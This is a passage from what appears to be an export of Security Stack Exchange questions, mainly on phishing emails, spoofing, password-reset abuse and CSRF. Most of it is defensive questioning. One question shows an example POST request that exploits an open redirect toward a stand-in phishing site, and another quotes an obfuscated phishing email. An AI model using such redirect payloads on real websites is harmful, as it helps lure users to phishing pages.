  spf=pass (google.com: domain of ebusiness@fcmb.com designates 41.223.147.112 as permitted sender) smtp.mailfrom=ebusiness@fcmb.com;
  dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=fcmb.com
 Message-ID: &amp;lt;5d700316.1c69fb81.8dceb.fbc9SMTPIN_ADDED_MISSING@mx.google.com&amp;gt;
 Received: from INTRANET (unknown [172.27.15.3]) 
  by lin-smtp.fcmb.com (Postfix) 
  with ESMTP id 69410875FC 
  for &amp;lt;XXX@GMAIL.COM&amp;gt;;
  Wed, 4 Sep 2019 19:43:36 +0100 (WAT)
 MIME-Version: 1.0
 From: FCMB &amp;lt;ebusiness@fcmb.com&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;How can I tell if this really being sent to me legitimately? Is this being faked in a way that I am missing things? In which case I want to better understand it since if not for all the red flags, I would have concluded that this email is legitimate.&lt;/p&gt;
 &lt;p&gt;P.S. This is the third email I've received in the last 2 months from FMCB that is addressed to "Daniel".&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;header&gt;</t>
  </si>
  <si>
    <t>MITM Attack on Gmail's SSL in 2011</t>
  </si>
  <si>
    <t>&lt;p&gt;I have read these posts: &lt;a href="https://www.cnet.com/news/fraudulent-google-certificate-points-to-internet-attack/" rel="nofollow noreferrer"&gt;https://www.cnet.com/news/fraudulent-google-certificate-points-to-internet-attack/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://support.google.com/mail/forum/AAAAK7un8RU3J3r2JqFNTw/?hl=en&amp;amp;gpf=d/category-topic/gmail/share-and-discuss-with-others/3J3r2JqFNTw" rel="nofollow noreferrer"&gt;https://support.google.com/mail/forum/AAAAK7un8RU3J3r2JqFNTw/?hl=en&amp;amp;gpf=d/category-topic/gmail/share-and-discuss-with-others/3J3r2JqFNTw&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;As far as I know, a certificate should be installed on a server.&lt;/p&gt;
 &lt;p&gt;So I don't quite understand how issuing a fraudulent certificate for *.google.com (the spelling of the common name is correct - it is not phishing) could trigger these browser warnings without installing it on a server.&lt;/p&gt;
 &lt;p&gt;I understand that a private key is in their hands but how did they manage to throw this certificate from the official Google website to users?&lt;/p&gt;
 &lt;p&gt;Did they install it on a Gmail server? &lt;/p&gt;
 &lt;p&gt;Could you explain, please?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/SwgWe.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/SwgWe.jpg" alt="Screenshot of certificate error in Chrome"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;man-in-the-middle&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>which password was paired with my gmail address</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently media have reported that a file of about 5 million gmail address and password pairs was published on a &lt;a href="https://forum.btcsec.com/index.php?/topic/9426-gmail-meniai-parol/" rel="nofollow"&gt;Russian Bitcoin forum&lt;/a&gt;. &lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.slate.com/blogs/future_tense/2014/09/10/gmail_password_hack_russian_bitcoin_forum_leaks_credentials_but_most_google.html" rel="nofollow"&gt;A media article on the leak&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Other media have reported that the password is typically not a gmail password and might be used on systems other than gmail where the gmail address is the identifier. I want to determine which of my passwords was paired with my gmail address. The link has a zip (7z) file and it appears that there are only gmail addresses present -- no passwords. Other media have reported that the posted file has been revised to exclude the passwords. &lt;/p&gt;
 &lt;p&gt;Is there a website that will email (to my gmail) the password that was leaked?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;phishing&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>Can ISPs be helpful in preventing spam?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have received a number of phishing emails from various domains. I would like to prevent the domain from sending emails so that other people also don't get taken advantage of. &lt;/p&gt;
 &lt;p&gt;I have not been successful talking to the registrar or host to take down the domain. Is there anything an ISP could do to prevent such emails from a known malicious domain?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;spam&gt;&lt;domain&gt;&lt;isp&gt;&lt;blacklist&gt;</t>
  </si>
  <si>
    <t>Phishing emails sent to my contacts, from another contact</t>
  </si>
  <si>
    <t>&lt;p&gt;Some people on my email contact list have been receiving phishing emails that appear to come from someone else on my contact list. The people receiving the emails and the person purportedly sending the emails are not themselves contacts.&lt;/p&gt;
 &lt;p&gt;If people on my contact list were receiving phishing emails from my account I would just conclude that my email was hacked, but what should I make of the fact that the emails are coming from this other email? Specifically, is it a &amp;quot;known&amp;quot; procedure for attackers to send phishing emails to a contact list, pretending to be someone else on the same contact list? I guess the attacker's assumption is that people on the same contact list will know each other?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Firewall egress filtering / quick whitelisting</t>
  </si>
  <si>
    <t>&lt;p&gt;Suppose your Aunt or Uncle is easily fooled by phishing attempts and their computer has multiple root kits and key loggers running. Assume their computing habits will never change. &lt;/p&gt;
 &lt;p&gt;Looking at his wireless router you can see that he only visits a few dozen or a few hundred websites multiple times in a month. Instead of trying to keep the bad guys out, set up the firewall's default outbound rule to be block (deny/reject) everything to prevent the bad guys from getting out.&lt;/p&gt;
 &lt;p&gt;If this non-technical relative had a simple python program running with an ssh connection into the firewall, the program could monitor the IP addresses as they get blocked. The program would then ask the user if they want to access 72.21.211.176 Amazon.com (USA). If the user says yes, the program might then ask: Allow outbound access to all 72.21.&lt;em&gt;.&lt;/em&gt; networks? This is an attempt to save some time creating a whitelist.&lt;/p&gt;
 &lt;p&gt;I know opinions vary as to the value of egress filtering. But with all the technology advances in the last 20 years, I find it frustrating that there is not a simple way for non-technical users to prevent sending data to that village in Wales (Llanfairpwllgwyngyll) that we all know is full of nation state hackers.&lt;br&gt;
 &lt;a href="http://en.wikipedia.org/wiki/Llanfairpwllgwyngyll" rel="nofollow"&gt;http://en.wikipedia.org/wiki/Llanfairpwllgwyngyll&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Since I am more of a SQL developer than a security expert, I am posting this to see if this would realistically help secure the home network in the example above. Of course the solution is not perfect, but it seems like it would help. This thought came about after reading about DGA malware that have been known to create thousands of new domains per second and realizing that attackers are way more sophisticated than I imagined. &lt;a href="http://en.wikipedia.org/wiki/Domain_generation_algorithm" rel="nofollow"&gt;http://en.wikipedia.org/wiki/Domain_generation_algorithm&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;
 As both answers indicate, this is not a good way to approach the problem. Too many IPs in the world and the user can't be trusted to allow only safe domains.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;linux&gt;&lt;firewalls&gt;&lt;iptables&gt;&lt;security-theater&gt;&lt;freebsd&gt;</t>
  </si>
  <si>
    <t>Are there more hacks done by social engineering, etc, than breaking the software system?</t>
  </si>
  <si>
    <t>&lt;p&gt;There is a saying that, rather than finding a vulnerability in a strong security system, the hacker is more likely to hack into your system by social engineering, physically breaking into the room the server is in, getting help from an insider, or even physically forcing you to compromise, etc, or any other way bypassing the software system.&lt;/p&gt;
 &lt;p&gt;Count phishing as a form of social engineering, this seemed quite convincing. But is it (or its negative) supported by any statistical data, say in the following cases?&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;For any hack.&lt;/li&gt;
 &lt;li&gt;For systems where the administrators supposedly know security enough.&lt;/li&gt;
 &lt;li&gt;For valuable targets.&lt;/li&gt;
 &lt;li&gt;Maybe others.&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Is this account change PDF email (supposedly from Paypal) an exploit?</t>
  </si>
  <si>
    <t>&lt;p&gt;i recently received the following (rather obvious) phishing email: &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/cgbXr.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/cgbXr.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;i'm not a PayPal user so this particularly un-alarming for me. however, when viewing as plain text, it became evident that there were hidden characters between every displayed letter of each word, as so:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;------------------------------ ------------------------------ ---------- Statement your account has been updated successfully on 12:30:14 pm Friday, December 22, 2017 &lt;/p&gt;
  &lt;hr&gt;
  &lt;p&gt;HzeglelMo,&lt;/p&gt;
  &lt;p&gt;YmocuTr aMcacdoduvnbt cfhoannlgze1s sHuzcocXeysVsmfEudlIlKy
  cwh9a2nOgVead.&lt;/p&gt;
  &lt;p&gt;TFhFe dHePt2aNi2lGs oZf thhte cThzaAnAgJe3s abr9e iIn aztbteaVcshsegd
  DLorwCnIlFo6ald aYn0d rgeuaid tchGe altjtFaScMhJepd YZobu w3inlWl
  fOiAnFd m5edsDs0aHgJe iQn A2dToebee RgefaEdAenr (kPyDKFV)
  AfwoHr1mraMtn.&lt;/p&gt;
  &lt;p&gt;TuhsaunxkWs fjorr jXori1neienRg t6hKe mkimlAlci4oKn6s off pkeiospslLe
  w8h8o rIeGlDy oSn uNs tho mpatkEe s4e2csu3rie fFiqnNaXnsccikaEl
  thrtaEnOsia2cFt6iWocn2s a7rUoPuTned tLh1e wIoxr5lnd0.&lt;/p&gt;
  &lt;p&gt;SIiTnocAefrSeVlWyd,W&lt;/p&gt;
  &lt;p&gt;PVacy6Pka1l1bidttS0u4pjp0oErCtE.k&lt;/p&gt;
  &lt;p&gt;HbeUlrp r|xddl8vSme5cKu6rQi8tcyoslnnfCte8nrtDrDe&lt;/p&gt;
  &lt;p&gt;PcavyqPzaDlkix8tt(yEGuIrRodp9eP) S.√† ri.jlH.IeSt C3i2ee, Sb.rC8.EAp.M
  SyobcHi√©t√© eOn CqoGmImwaBnmdhiYtfe plaAr AacNtkiIonXs.
  RoeSgPirsNtpe6rreWd oefGfJi1cteD: 212w-t2P4 BloJuJl5ejvBaYrmd
  R6oGykahl, Ls-c2S4r4r9 Lzulx1etmbb7u9rkg1. RKCHS LmuFxweCmUbyuLrmg BE
  161t8 3V419a.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;what could this be for? has anyone ever seen this?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt; - here are the From + Subject headings&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;From: service@intl.paypal.com .
  &lt;/p&gt;
  &lt;p&gt;Sent: Sunday, December 24, 2017 9:39 PM&lt;/p&gt;
  &lt;p&gt;Subject: Case ID Number PP-M-LL0PUG4V : Statement your account has
  been updated successfully on 12:30:14 pm Friday, December 22, 2017&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>Does AV software protect web applications (Twitter, Facebook, etc) from attacks? (CSRF, etc)</t>
  </si>
  <si>
    <t>&lt;p&gt;Is it correct to say that AV software focuses on downloaded executables and locally malicious activity, and it doesn't actively scan HTTP/S content for web based attacks such as CSRF, XSS, phishing URL's and other attacks?&lt;/p&gt;
 &lt;p&gt;Is there anything that can be installed on a desktop (Mac, PC or Linux) that can protect against this class of threats?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Since asking product recommendations are generally frowned upon on this site, I'm looking for a &lt;em&gt;keyword&lt;/em&gt; or technology to search for. &lt;/p&gt;
 &lt;p&gt;(sample fictitious keywords: Facebook Firewall, AV 2.0 + social media protection, CSRF Shield)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;web-browser&gt;&lt;antivirus&gt;&lt;csrf&gt;&lt;antimalware&gt;</t>
  </si>
  <si>
    <t>Repeated microsoft password reset requests - Should I be concerned?</t>
  </si>
  <si>
    <t>&lt;h1&gt;Background&lt;/h1&gt;
 &lt;p&gt;Since the middle of last month, I have started recieving multiple microsoft password reset e-mails a day, sent to my secondary e-mail address, regarding my primary e-mail address.&lt;/p&gt;
 &lt;p&gt;These e-mails have no phishing-like links in. I believe them to be a legiitimate password reset e-mails.
 Which means someone is repeatedly trying to reset my password.&lt;/p&gt;
 &lt;p&gt;There appear to be no (recognizable) attempts to break into my secondary e-mail account.&lt;/p&gt;
 &lt;p&gt;Both accounts have 2FA enabled, and have randomly generated 30+ character passwords generated by and stored in a password manager. The primary account has enforced 72-day password changes enabled.&lt;/p&gt;
 &lt;h1&gt;Questions&lt;/h1&gt;
 &lt;p&gt;1.) Is it likely the attacks are just trying to guess the 7 digit security code each time. Or is something more sinsiter likely going on?&lt;/p&gt;
 &lt;p&gt;2.) In cases like this, is it any way to say that, no, I did NOT request such a reset. (&lt;em&gt;Note: I'm wary that it is possible that only someone working at Microsoft might be able to answer this. If this &lt;strong&gt;IS&lt;/strong&gt; the case, please ignore this part of the question&lt;/em&gt;)&lt;/p&gt;
 &lt;p&gt;3.) Should I be concerned about this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;password-reset&gt;</t>
  </si>
  <si>
    <t>Active Directory "Forgot password" feature without email or text</t>
  </si>
  <si>
    <t>&lt;p&gt;We're currently looking to implement a secure AD password self-reset feature for our users. Our scenario is to manage people who &lt;strong&gt;forgot&lt;/strong&gt; their password, not those who want to change it. Our users are usually based on remote locations and most of the time don't have access to a VPN. Our first thought was to provide a web-interface where users must authenticate using their username and an authentication factor which could be: &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;A private question/answer; &lt;/li&gt;
 &lt;li&gt;An OTP sent by text message to a user's
 pre-registered mobile phone; &lt;/li&gt;
 &lt;li&gt;An OTP included in a password reset link sent to a user's pre-registered private email address (e.g. Gmail).&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;But due to organizational constrains, we cannot rely on text messages to send an OTP, and we don't consider the question/answer to be secure enough. So we are left with the private email option, which still concerns us because:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The email provider or the email account could be compromised;&lt;/li&gt;
 &lt;li&gt;The email provider will be able to associate an email with our organization (which can be an issue sometimes);&lt;/li&gt;
 &lt;li&gt;We consider it would open the door for phishing attacks - going against our communication to users saying that they should never, ever open a link that pretends to come from the organization on a private email address.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;strong&gt;So is there a way to allow users to reset their AD password without using text messages or private emails, and without using a commercial (paying) solution?&lt;/strong&gt; &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;password-management&gt;&lt;one-time-password&gt;&lt;password-reset&gt;</t>
  </si>
  <si>
    <t>Why does Google not block logoff CSRF?</t>
  </si>
  <si>
    <t>&lt;p&gt;Google is a &lt;a href="https://sites.google.com/site/bughunteruniversity/nonvuln/logout-xsrf" rel="nofollow noreferrer"&gt;famous example&lt;/a&gt; of &lt;em&gt;not&lt;/em&gt; blocking CSRF on logout/logoff pages.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Some vulnerability reporters contact us about the ability to log out
  Google users by navigating their browser to a particular URL. In some
  ways, this behavior is undesirable, but we believe that it cannot be
  reliably addressed on the modern web: for example, malicious websites
  may also simply overflow the browser cookie jar and drop your
  authentication cookies for other websites on the Internet.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The as of today &lt;a href="https://security.stackexchange.com/a/62797/5997"&gt;most popular answer&lt;/a&gt; to &lt;a href="https://security.stackexchange.com/q/62769/5997"&gt;Must login and logout action have CSRF protection?&lt;/a&gt; disagrees, citing phishing concerns.
 The &lt;a href="https://security.stackexchange.com/a/62772/5997"&gt;second most popular answer&lt;/a&gt; says it's not necessary, but the attack could cause inconveniences.
 The &lt;a href="https://security.stackexchange.com/a/95569/5997"&gt;third answer&lt;/a&gt; says protection is a must.&lt;/p&gt;
 &lt;p&gt;Why does Google take a contrary stance here? Why does Google keep this stance and/or, why do so few individuals seem to agree?&lt;/p&gt;
 &lt;p&gt;Note: Numerous places online reference the fact that Google has discussed this "ad nauseum," but I didn't find the actual discussions.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: It's not just Google, but many major sites do this.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edit 2&lt;/strong&gt;: This question is not a duplicate of &lt;a href="https://security.stackexchange.com/questions/62769/must-login-and-logout-action-have-csrf-protection"&gt;Must login and logout action have CSRF protection?&lt;/a&gt; because I am not asking whether a page needs to have logout CSRF protection or not. I am asking&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;What Google's reasoning for their stance is (they provided only a portion of their reasoning in the quoted excerpt) and&lt;/li&gt;
 &lt;li&gt;Why there is an apparent division between Google and the answers on that question.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;This question is primarily trying to unpack the reasoning for Google's security decision, a detailed case study rather than a broad treatment.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;csrf&gt;&lt;google&gt;</t>
  </si>
  <si>
    <t>Best way to prevent phishing by turning off HTML links</t>
  </si>
  <si>
    <t>&lt;p&gt;phishing attacks are very common nowadays. Innocent victims click on suspicious links in emails and get infected. I know that to prevent phishing, one of the ways is to educate users on the proper usage of emails and preventive measures. However, my opinion is why not totally strip html links in email messages at the exchange/mail server such that no one has the chance to click on any links ? Modern email servers are able to do this type of filtering. However, i am not sure what are the implications to users. Have you done this before and what obstacles have you faced? thanks&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;awareness&gt;</t>
  </si>
  <si>
    <t>Why can't mail clients verify an email was sent from the user and server it claims to be from?</t>
  </si>
  <si>
    <t>&lt;h1&gt;Background&lt;/h1&gt;
 &lt;p&gt;When I explain to my clients the security issues around email spoofing, I often explain that emails are like regular mail. Anyone can write &lt;strong&gt;Jon Doe&lt;/strong&gt; on the return address, but that doesn't necessarily mean that &lt;strong&gt;Jon Doe&lt;/strong&gt; sent it.&lt;/p&gt;
 &lt;h1&gt;Potential Solution?&lt;/h1&gt;
 &lt;p&gt;Why can't an email server be setup to receive the following fields over a TLS session:&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;domain&lt;/code&gt;&lt;br /&gt;
 &lt;code&gt;sender&lt;/code&gt;&lt;br /&gt;
 &lt;code&gt;hash of email&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;And return &lt;em&gt;True&lt;/em&gt; if an email was sent that fits those values.&lt;/p&gt;
 &lt;p&gt;After every email the client receives, it can reach out to that email server with those values. If the client gets a return of &lt;em&gt;False&lt;/em&gt;, just drop the email.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;spoofing&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>What's the security risk in password recovery attempts</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm the administrator of a Wordpress site, with just two users: me and one other user. Last days I've received multiple password recovery attempts for that other user (as an administrator I get a mail from the Wordfence security plugin). The other user gets the reset mail in his mailbox. The user didn't initiate these attempts.&lt;/p&gt;
 &lt;p&gt;I'm blocking the IP's on the server, but I don't see what the goal of the attacker is. I checked the mails the user receives, and they contain a valid password reset link (so no phishing attempt).&lt;/p&gt;
 &lt;p&gt;So I don't really understand what the attacker is trying to achieve with these password recovery requests. Or are they just checking for vulnerabilities on that page?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wordpress&gt;&lt;password-reset&gt;</t>
  </si>
  <si>
    <t>Identity theft from ubuntu machine?</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently my debit card information went to another hand, and he/she started to using it until my bank reports that there is an overdraft. I use Ubuntu 14.04 machine.&lt;/p&gt;
 &lt;p&gt;I am sure I am not a victim of phishing, or email-scam. But I sometime use debit card for online purchases. &lt;/p&gt;
 &lt;p&gt;Moreover, after going through my account history, I have noticed that these unauthorized transactions occurred just a couple of days after a taxi ride, where I had to pay with my debit card.&lt;/p&gt;
 &lt;p&gt;And during the same time I just started to explore the Tor network. &lt;/p&gt;
 &lt;p&gt;I do not have any firewall.&lt;/p&gt;
 &lt;p&gt;what could be the reason? Any idea?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;unix&gt;&lt;identity-theft&gt;</t>
  </si>
  <si>
    <t>Exploiting an Open Redirect in POST body?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have the following example POST request as part of a feedback form for a website that allows for an arbitrary value to be supplied to the "done_url" parameter, allowing for an open redirect after the feedback form has been processed.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;POST /cgi-bin/formproc2.cgi HTTP/1.1
 Host: foobar.com
 mail_to=support%40support.com&amp;amp;subject=Feedback+Form&amp;amp;done_url=http://phishingsite.com&amp;amp;feedback=I+love+your+site&amp;amp;Submit=Submit
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I am familiar with the typical forms of phishing done for open redirects in GET requests, such as this example &lt;a href="http://www.secureworks.com/resources/blog/research/spam-government-websites-abused-ongoing-spam-campaign/" rel="nofollow"&gt;http://www.secureworks.com/resources/blog/research/spam-government-websites-abused-ongoing-spam-campaign/&lt;/a&gt; &lt;/p&gt;
 &lt;p&gt;But how would an attacker exploit this redirect in the POST body?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;exploit&gt;&lt;phishing&gt;&lt;url-redirection&gt;</t>
  </si>
  <si>
    <t>What is the impact of the Bluebox Android APK integrity vulnerability?</t>
  </si>
  <si>
    <t>&lt;p&gt;Bluebox have &lt;a href="http://bluebox.com/corporate-blog/bluebox-uncovers-android-master-key/" rel="nofollow"&gt;recently disclosed&lt;/a&gt; a vulnerability (Android security bug 8219321) in Android, that is getting &lt;a href="https://news.google.com/news?ncl=d9cj_iJhqSCDaiM3nOvH1p_lvS9ZM&amp;amp;q=bluebox%20android%20security&amp;amp;lr=English&amp;amp;hl=en" rel="nofollow"&gt;a lot of coverage&lt;/a&gt; in the media.&lt;/p&gt;
 &lt;p&gt;The title of the post is "Uncovering Android Master Key" - I'm assuming this is just a media-friendly headline, and a master key doesn't come in to it.&lt;/p&gt;
 &lt;p&gt;From what they have disclosed so far, it allows for &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;APK code modification without breaking the cryptographic signature&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Taking this at face value, if it is possible to take a signed Android application (APK) and modify it without invalidating the signature, what &lt;em&gt;practical&lt;/em&gt; attacks are possible?&lt;/p&gt;
 &lt;p&gt;What is the risk to a typical Play-store-only user (probably only installing high ranking search results and featured apps in the Play store)?&lt;/p&gt;
 &lt;p&gt;Some more specific questions:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;Given a validly signed (maliciously modified) APK, what are the barriers to getting the legitimate Play store version of the app updated with that file?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Would a man-in-the-middle attacker (e.g. malicious wifi hotspot) be able to exploit auto update in any way (this might be - are APKs delivered over HTTPS?)&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;They state that a signed app that appears to come from the device manufacturer allows full system access - are these permissions different to the normal Android permissions system? How does it work? Are system updates delivered as APKs and is there any risk here?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;How much does this help phishing attacks? Presumably a user would still need to enable installation from "unknown sources"?&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I appreciate that at this point the full details of the vulnerability are not publicly available*, so I'm looking for answers based on the above quote, and possibly extrapolating additional information from anything else Bluebox have said or from other reputable sources.&lt;/p&gt;
 &lt;p&gt;&lt;sub&gt;* presumably if this bug has been fixed in any publicly released updates, we will very quickly find out what it is from people analysing the deltas in the APK verification area.&lt;/sub&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;known-vulnerabilities&gt;&lt;android&gt;&lt;code-signing&gt;</t>
  </si>
  <si>
    <t>Is BSI‚Äôs process good? (Informing email address owners that their address/password (of unknown/different accounts) was stolen)</t>
  </si>
  <si>
    <t>&lt;p&gt;The German &lt;a href="http://en.wikipedia.org/wiki/Federal_Office_for_Information_Security" rel="nofollow"&gt;BSI (Federal Office for Information Security)&lt;/a&gt; &lt;a href="http://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2014/Neuer_Fall_von_Identitaetsdiebstahl_07042014.html" rel="nofollow"&gt;claims&lt;/a&gt; to have got a list of 18 million email addresses and passwords ‚Äì supposed to be the result of identity theft.&lt;/p&gt;
 &lt;p&gt;They allow to check if your own email address is part of this (or an older) list, which works like that:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Enter an email address at &lt;a href="https://www.sicherheitstest.bsi.de/" rel="nofollow"&gt;https://www.sicherheitstest.bsi.de/&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;After submission, they show a four-digit code.&lt;/li&gt;
 &lt;li&gt;If the entered email address is NOT part of the list: Nothing happens.&lt;/li&gt;
 &lt;li&gt;If the entered email address is part of the list: The BSI sends an email to the entered address, which 
 &lt;ul&gt;
 &lt;li&gt;is signed with their OpenPGP key, and&lt;/li&gt;
 &lt;li&gt;contains the four-digit code in the subject line.&lt;/li&gt;
 &lt;li&gt;(The mail doesn‚Äôt contain the password.)&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;The OpenPGP signature and the code in the subject line make sure that the email is really coming from the BSI (phishers already send emails in the name of the BSI). &lt;/p&gt;
 &lt;p&gt;But besides that, &lt;strong&gt;is this process really a good practice?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;As far as I can see, it has two problems:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;It‚Äôs not known if the list contains logins for email providers or for other sites (shops etc.). But &lt;em&gt;if&lt;/em&gt; these would be logins for the email accounts (or if people use the same password there), the thiefs could control the email account and filter out any email coming from the BSI, right? So these people would never notice that their data is contained in BSI‚Äôs list.
 &lt;ul&gt;
 &lt;li&gt;So people that don‚Äôt get a mail can‚Äôt be sure if their data is not in the list or if the mail got intercepted (unless they change their password before even entering their email address in the test).&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;li&gt;And as they don‚Äôt send the password contained in the list, users (that use unique passwords for each site) can‚Äôt know &lt;em&gt;which&lt;/em&gt; of their accounts are affected (‚Üí many sites use the email address as username).
 &lt;ul&gt;
 &lt;li&gt;So people would have to change their passwords on &lt;em&gt;all&lt;/em&gt; sites using their email address as username.&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Am I right? Or are there good reasons why they handle it like that?&lt;/p&gt;
 &lt;p&gt;Could the process be improved? Are there any best practices for such situations where the data of many different services is involved (and not only from a single provider)?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;email&gt;&lt;disclosure&gt;&lt;government&gt;&lt;identity-theft&gt;</t>
  </si>
  <si>
    <t>Checking "return" parameter in login page</t>
  </si>
  <si>
    <t>&lt;p&gt;My login page accepts the "return" parameter, which should contain URI to redirect user if he wasn't logged in and tried to access page which isn't accessible by unauthenticated users. It could be anything from my site.&lt;/p&gt;
 &lt;p&gt;How do I properly check that parameter in my server code, before I return HTTP 302 status with that URI to user after he successfully authenticated on the login page?&lt;/p&gt;
 &lt;p&gt;Is it enough to check that &lt;code&gt;uri[0] == '/' &amp;amp;&amp;amp; uri[1] != '/'&lt;/code&gt; (so malicious user won't send request like &lt;code&gt;/login?return=http://google.com&lt;/code&gt;)? &lt;/p&gt;
 &lt;p&gt;Can a malicious user construct some tricky uri which will send victim user to trouble? 
 Of course I assume that other pages do not contain XSS vulnerabilities, GET request do not change anything in the database, etc. &lt;/p&gt;
 &lt;p&gt;If a malicious user can trick the victim to click on his link and the victim user is already logged in, things will happen anyway and I can't do anything to prevent that except implement known security measures such as CSRF protection, etc.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Why are there so many special characters in this phishing link?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently looked at a spam mail I received. Generally, I'd say it was a fairly standard phishing attempt, but one thing struck me as odd:&lt;/p&gt;
 &lt;p&gt;The link that victims are supposed to click looks very weird and (apart from the domain name) consists almost exclusively of special characters, to the point that it sort of looks like cartoon swearing. Most special characters were escaped, some were not.&lt;/p&gt;
 &lt;p&gt;Here's a portion of the link: &lt;code&gt;%C2%A3!!%C2%A3%22%C2%A3%22%25%5E%25%25%26%5E*%26(%26(*)*(%5E&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;Why do attackers do this?&lt;/p&gt;
 &lt;p&gt;After all, the link would probably look much more convincing if it contained more words, maybe fake domain names etc.&lt;/p&gt;
 &lt;p&gt;Is this meant to make it harder to copy the link without damaging it? Or to confuse novice shell users attempting analysis (notice the &lt;code&gt;!!&lt;/code&gt; which is somewhat hard to escape in Bash)?&lt;/p&gt;
 &lt;p&gt;Or is this just meant to look computer-y and difficult to inexperienced computer users to make it look more real?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;url&gt;&lt;incident-analysis&gt;</t>
  </si>
  <si>
    <t>Clicked a shortened link in a phishing email in Mac</t>
  </si>
  <si>
    <t>&lt;p&gt;Today, I got a fake email that says it's from Amazon and I clicked a shortened url link in that email in both Google Chrome and Firefox. I noticed that the url it redirected to was not of Amazon's, so I immediately realized that I was phished, so I didn't enter any info. &lt;/p&gt;
